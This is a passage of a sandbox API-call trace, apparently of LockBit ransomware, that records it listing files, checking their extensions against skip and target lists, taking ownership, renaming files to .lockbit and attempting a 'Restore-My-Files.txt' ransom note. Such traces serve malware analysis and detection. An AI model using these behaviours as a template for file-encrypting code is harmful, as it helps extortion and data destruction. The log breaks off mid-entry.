[0097.623] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0097.623] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c9602b, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c9602b, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa62, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="ipsfin.xml", cAlternateFileName="")) returned 1 [0097.623] lstrcmpiW (lpString1=".", lpString2="ipsfin.xml") returned -1 [0097.624] lstrcmpiW (lpString1="..", lpString2="ipsfin.xml") returned -1 [0097.624] PathFindExtensionW (pszPath="ipsfin.xml") returned=".xml" [0097.624] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0097.624] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0097.624] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0097.624] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0097.624] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0097.624] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0097.624] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0097.624] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0097.624] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0097.624] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0097.624] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0097.624] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0097.624] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0097.625] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0097.625] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0097.625] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0097.625] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0097.625] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0097.625] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0097.625] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0097.625] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0097.625] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0097.625] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0097.625] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0097.625] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0097.625] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0097.625] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0097.625] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0097.625] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0097.625] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0097.625] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0097.625] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0097.625] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0097.625] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0097.625] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0097.626] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0097.626] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0097.626] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0097.626] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0097.626] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0097.626] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0097.626] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0097.626] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0097.626] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0097.626] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0097.626] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0097.626] wsprintfW (in: param_1=0x344d620, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0097.626] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ipsfin.xml") returned 1 [0097.626] lstrcmpiW (lpString1="ntldr", lpString2="ipsfin.xml") returned 1 [0097.626] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ipsfin.xml") returned 1 [0097.626] lstrcmpiW (lpString1="bootsect.bak", lpString2="ipsfin.xml") returned -1 [0097.626] lstrcmpiW (lpString1="autorun.inf", lpString2="ipsfin.xml") returned -1 [0097.626] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\") returned="" [0097.627] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml") returned=".xml" [0097.627] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0097.627] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0097.627] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0097.627] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0097.627] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0097.627] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0097.627] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0097.627] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0097.627] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0097.627] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0097.627] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0097.627] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0097.627] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0097.627] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0097.627] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0097.627] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0097.627] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0097.627] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0097.627] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0097.627] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0097.627] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0097.627] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0097.628] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0097.628] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0097.628] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0097.628] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0097.628] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0097.628] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0097.628] wsprintfW (in: param_1=0x344cdc0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.lockbit") returned 70 [0097.628] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0097.628] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml.lockbit")) returned 0 [0097.628] GetLastError () returned 0x5 [0097.632] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0097.633] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0097.633] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0097.633] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0097.634] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0097.634] NtOpenFile (in: FileHandle=0x344cd68, DesiredAccess=0x80, ObjectAttributes=0x344cc18*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344cc10, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344cd68*=0xac4, IoStatusBlock=0x344cc10*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0097.635] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0097.635] NtQueryInformationFile (in: FileHandle=0xac4, IoStatusBlock=0x344cc30, FileInformation=0x344caf0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344cc30, FileInformation=0x344caf0) returned 0x0 [0097.642] NtClose (Handle=0xac4) returned 0x0 [0097.642] RtlFreeAnsiString (AnsiString="\\") [0097.642] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344cda4 | out: TokenHandle=0x344cda4*=0xac4) returned 1 [0097.642] malloc (_Size=0x200) returned 0x3981cc0 [0097.642] GetTokenInformation (in: TokenHandle=0xac4, TokenInformationClass=0x1, TokenInformation=0x3981cc0, TokenInformationLength=0x200, ReturnLength=0x344cda0 | out: TokenInformation=0x3981cc0, ReturnLength=0x344cda0) returned 1 [0097.642] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344cd88, dwRevision=0x1 | out: pSecurityDescriptor=0x344cd88) returned 1 [0097.642] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344cd88, pOwner=0x3981cc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344cd88) returned 1 [0097.642] CloseHandle (hObject=0xac4) returned 1 [0097.642] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344cd88) returned 1 [0097.643] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344cd88) returned 1 [0097.643] free (_Block=0x3981cc0) [0097.643] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0097.643] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml.lockbit")) returned 1 [0097.644] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xac4 [0097.644] CreateIoCompletionPort (FileHandle=0xac4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0097.644] malloc (_Size=0x40068) returned 0x20acee8 [0097.644] GetFileSizeEx (in: hFile=0xac4, lpFileSize=0x20acf00 | out: lpFileSize=0x20acf00*=2658) returned 1 [0097.644] ReadFile (in: hFile=0xac4, lpBuffer=0x20acf1c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x20acee8 | out: lpBuffer=0x20acf1c, lpNumberOfBytesRead=0x0, lpOverlapped=0x20acee8) returned 0x0 [0097.646] GetLastError () returned 0x3e5 [0097.646] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink") returned 1 [0097.646] wsprintfW (in: param_1=0x344cb78, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt") returned 72 [0097.646] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0097.646] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27cbc188, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27cbc188, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa44, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="ipsfra.xml", cAlternateFileName="")) returned 1 [0097.646] lstrcmpiW (lpString1=".", lpString2="ipsfra.xml") returned -1 [0097.646] lstrcmpiW (lpString1="..", lpString2="ipsfra.xml") returned -1 [0097.646] PathFindExtensionW (pszPath="ipsfra.xml") returned=".xml" [0097.646] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0097.646] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0097.646] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0097.646] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0097.646] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0097.646] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0097.646] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0097.647] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0097.647] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0097.647] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0097.647] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0097.647] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0097.647] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0097.647] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0097.647] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0097.647] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0097.647] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0097.647] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0097.647] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0097.647] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0097.647] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0097.647] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0097.647] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0097.647] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0097.647] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0097.647] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0097.647] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0097.647] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0097.647] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0097.647] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0097.647] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0097.648] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0097.648] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0097.648] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0097.648] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0097.648] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0097.648] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0097.648] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0097.648] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0097.648] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0097.648] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0097.648] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0097.648] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0097.648] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0097.648] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0097.648] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0097.648] wsprintfW (in: param_1=0x344d620, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0097.648] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ipsfra.xml") returned 1 [0097.648] lstrcmpiW (lpString1="ntldr", lpString2="ipsfra.xml") returned 1 [0097.648] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ipsfra.xml") returned 1 [0097.648] lstrcmpiW (lpString1="bootsect.bak", lpString2="ipsfra.xml") returned -1 [0097.648] lstrcmpiW (lpString1="autorun.inf", lpString2="ipsfra.xml") returned -1 [0097.648] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\") returned="" [0097.648] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned=".xml" [0097.648] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0097.648] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0097.649] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0097.649] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0097.649] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0097.649] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0097.649] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0097.649] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0097.649] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0097.649] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0097.649] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0097.649] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0097.649] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0097.649] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0097.649] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0097.649] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0097.649] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0097.649] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0097.649] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0097.649] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0097.649] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0097.649] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0097.649] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0097.649] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0097.649] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0097.649] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0097.649] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0097.649] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0097.649] wsprintfW (in: param_1=0x344cdc0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.lockbit") returned 70 [0097.650] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0097.650] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml.lockbit")) returned 0 [0097.813] GetLastError () returned 0x5 [0097.817] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0097.817] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0097.818] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0097.818] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0097.819] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0097.819] NtOpenFile (in: FileHandle=0x344cd68, DesiredAccess=0x80, ObjectAttributes=0x344cc18*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344cc10, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344cd68*=0xcf4, IoStatusBlock=0x344cc10*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0097.821] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0097.821] NtQueryInformationFile (in: FileHandle=0xcf4, IoStatusBlock=0x344cc30, FileInformation=0x344caf0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344cc30, FileInformation=0x344caf0) returned 0x0 [0098.014] NtClose (Handle=0xcf4) returned 0x0 [0098.014] RtlFreeAnsiString (AnsiString="\\") [0098.014] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344cda4 | out: TokenHandle=0x344cda4*=0xcf4) returned 1 [0098.014] malloc (_Size=0x200) returned 0x3981cc0 [0098.014] GetTokenInformation (in: TokenHandle=0xcf4, TokenInformationClass=0x1, TokenInformation=0x3981cc0, TokenInformationLength=0x200, ReturnLength=0x344cda0 | out: TokenInformation=0x3981cc0, ReturnLength=0x344cda0) returned 1 [0098.014] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344cd88, dwRevision=0x1 | out: pSecurityDescriptor=0x344cd88) returned 1 [0098.014] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344cd88, pOwner=0x3981cc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344cd88) returned 1 [0098.015] CloseHandle (hObject=0xcf4) returned 1 [0098.015] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344cd88) returned 1 [0098.015] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344cd88) returned 1 [0098.016] free (_Block=0x3981cc0) [0098.016] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0098.016] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml.lockbit")) returned 1 [0098.017] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xcf4 [0098.017] CreateIoCompletionPort (FileHandle=0xcf4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0098.017] malloc (_Size=0x40068) returned 0x3940048 [0098.017] GetFileSizeEx (in: hFile=0xcf4, lpFileSize=0x3940060 | out: lpFileSize=0x3940060*=2628) returned 1 [0098.017] ReadFile (in: hFile=0xcf4, lpBuffer=0x394007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 1 [0098.020] GetLastError () returned 0x3e5 [0098.020] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink") returned 1 [0098.021] wsprintfW (in: param_1=0x344cb78, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt") returned 72 [0098.021] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0098.021] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27ce22e5, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27ce22e5, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa5c, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="ipshrv.xml", cAlternateFileName="")) returned 1 [0098.021] lstrcmpiW (lpString1=".", lpString2="ipshrv.xml") returned -1 [0098.021] lstrcmpiW (lpString1="..", lpString2="ipshrv.xml") returned -1 [0098.021] PathFindExtensionW (pszPath="ipshrv.xml") returned=".xml" [0098.021] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0098.021] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0098.021] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0098.021] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0098.021] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0098.021] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0098.021] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0098.021] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0098.021] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0098.021] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0098.021] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0098.021] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0098.021] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0098.021] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0098.022] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0098.022] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0098.022] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0098.022] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0098.022] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned 